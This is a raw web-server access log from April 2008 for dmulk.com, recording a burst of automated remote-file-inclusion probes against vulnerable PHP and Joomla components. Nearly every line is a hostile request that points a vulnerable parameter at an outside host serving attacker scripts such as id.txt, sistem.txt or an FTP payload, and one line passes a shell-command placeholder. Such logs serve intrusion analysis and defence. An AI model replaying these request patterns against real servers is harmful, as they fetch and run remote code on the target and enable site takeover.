74.6.22.87 - - [10/Apr/2008:09:16:49 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.52.111 - - [10/Apr/2008:09:16:50 -0700] "GET /blog/wp-login.php HTTP/1.0" 200 1790 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:16:56 -0700] "GET /logs/access_080401.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=SHELL%20CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:16:58 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.116.14.99 - - [10/Apr/2008:09:17:02 -0700] "GET /logs/access.log/index.php?x=http://www.mitumaco.com/alex2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.203.76.10 - - [10/Apr/2008:09:17:08 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.203.76.10 - - [10/Apr/2008:09:17:21 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.221.117.243 - - [10/Apr/2008:09:17:22 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yourbesttype.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.221.117.243 - - [10/Apr/2008:09:17:23 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yourbesttype.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.221.117.243 - - [10/Apr/2008:09:17:24 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yourbesttype.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:17:38 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:17:39 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:17:39 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.138.166 - - [10/Apr/2008:09:17:40 -0700] "GET //citywriter/head.php?path=http://pensacolamicro.com/s0_data/_vti_cnf/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:17:42 -0700] "GET /logs/access_080211.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:17:43 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:17:44 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:17:46 -0700] "GET /logs/access_080211.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:17:47 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:17:48 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:17:59 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:18:00 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:18:00 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:09:18:17 -0700] "GET /logs/access_080224.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:18:20 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:18:25 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:18:26 -0700] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:18:30 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:18:31 -0700] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [10/Apr/2008:09:19:06 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://h1.ripway.com/reyen/file/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:19:08 -0700] "GET /logs/access_080223.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:19:13 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [10/Apr/2008:09:19:13 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://h1.ripway.com/reyen/file/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:19:14 -0700] "GET /logs/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [10/Apr/2008:09:19:17 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://h1.ripway.com/reyen/file/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
84.19.178.201 - - [10/Apr/2008:09:19:28 -0700] "GET /logs/access_071217.log//skin/zero_vote/ask_password.php?dir=http://bnb-chambresdhotes.ch/components/com_easygallery/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [10/Apr/2008:09:19:29 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://bnb-chambresdhotes.ch/components/com_easygallery/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [10/Apr/2008:09:19:29 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://bnb-chambresdhotes.ch/components/com_easygallery/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.65.191 - - [10/Apr/2008:09:19:43 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:09:19:51 -0700] "GET /logs/access_080224.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:19:58 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:19:59 -0700] "GET //index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:20:49 -0700] "GET /logs/access_080215.log/xGB.php?act=admin&do=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:20:50 -0700] "GET /xGB.php?act=admin&do=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:20:50 -0700] "GET /logs/xGB.php?act=admin&do=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:09:21:02 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.26.84 - - [10/Apr/2008:09:21:34 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [10/Apr/2008:09:21:35 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.58.254.89 - - [10/Apr/2008:09:21:41 -0700] "GET /logs//mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
211.58.254.89 - - [10/Apr/2008:09:21:41 -0700] "GET //mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:21:47 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:21:47 -0700] "GET /convert/mvcw.php?vwar_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.174.160 - - [10/Apr/2008:09:21:48 -0700] "GET /logs/access.log//oneadmin/config.php?path[docroot]=http://www.unescoulsan.org/bbs//data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:21:48 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.174.160 - - [10/Apr/2008:09:21:48 -0700] "GET //oneadmin/config.php?path[docroot]=http://www.unescoulsan.org/bbs//data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.114.174.160 - - [10/Apr/2008:09:21:48 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://www.unescoulsan.org/bbs//data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:21:49 -0700] "GET /logs/access_080131.log/xGB.php?act=admin&do=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:21:50 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:21:50 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:21:50 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.67.26.84 - - [10/Apr/2008:09:21:57 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.114.174.160 - - [10/Apr/2008:09:21:57 -0700] "GET /logs/access.log//oneadmin/config.php?path[docroot]=http://www.unescoulsan.org/bbs//data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.114.174.160 - - [10/Apr/2008:09:21:58 -0700] "GET //oneadmin/config.php?path[docroot]=http://www.unescoulsan.org/bbs//data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.114.174.160 - - [10/Apr/2008:09:21:58 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://www.unescoulsan.org/bbs//data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.207.204.13 - - [10/Apr/2008:09:22:02 -0700] "GET /myevent.php?myevent_path=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:09:22:05 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.191 - - [10/Apr/2008:09:22:07 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.191 - - [10/Apr/2008:09:22:07 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:22:28 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:22:34 -0700] "GET //index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:22:39 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:22:43 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:22:48 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.65.191 - - [10/Apr/2008:09:23:04 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.191 - - [10/Apr/2008:09:23:04 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.191 - - [10/Apr/2008:09:23:05 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:09:23:07 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:09:23:13 -0700] "GET /logs/access_080224.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://csinfo.pl/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.207.204.13 - - [10/Apr/2008:09:23:18 -0700] "GET /logs/access_080120.log/myevent.php?myevent_path=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [10/Apr/2008:09:23:18 -0700] "GET /myevent.php?myevent_path=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [10/Apr/2008:09:23:18 -0700] "GET /logs/myevent.php?myevent_path=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:23:21 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:23:21 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.65.191 - - [10/Apr/2008:09:23:24 -0700] "GET /logs/access_080128.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:09:23:24 -0700] "GET /logs/access_080128.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:09:23:24 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:09:23:31 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:09:23:41 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:09:23:42 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:24:02 -0700] "GET /logs/access_080223.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:24:02 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:09:24:03 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:24:04 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:24:08 -0700] "GET /logs/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:24:25 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:24:25 -0700] "GET //index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
212.116.174.9 - - [10/Apr/2008:09:24:29 -0700] "GET /logs/access_080308.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/reyen/file/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [10/Apr/2008:09:24:32 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/reyen/file/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [10/Apr/2008:09:24:36 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/reyen/file/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.227.65.191 - - [10/Apr/2008:09:24:39 -0700] "GET /logs/access_080128.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.243.253.159 - - [10/Apr/2008:09:25:30 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:09:25:30 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.10.128.138 - - [10/Apr/2008:09:25:30 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.128.138 - - [10/Apr/2008:09:25:31 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.128.138 - - [10/Apr/2008:09:25:55 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:09:25:59 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.162.213 - - [10/Apr/2008:09:26:05 -0700] "GET /logs/access_080218.log//index.php?pagina=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:26:11 -0700] "GET /logs/access_071201.log/port.php?content=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:26:13 -0700] "GET /port.php?content=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:26:16 -0700] "GET /logs/port.php?content=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:26:17 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:26:18 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:26:18 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:09:26:27 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:09:26:28 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:09:26:29 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
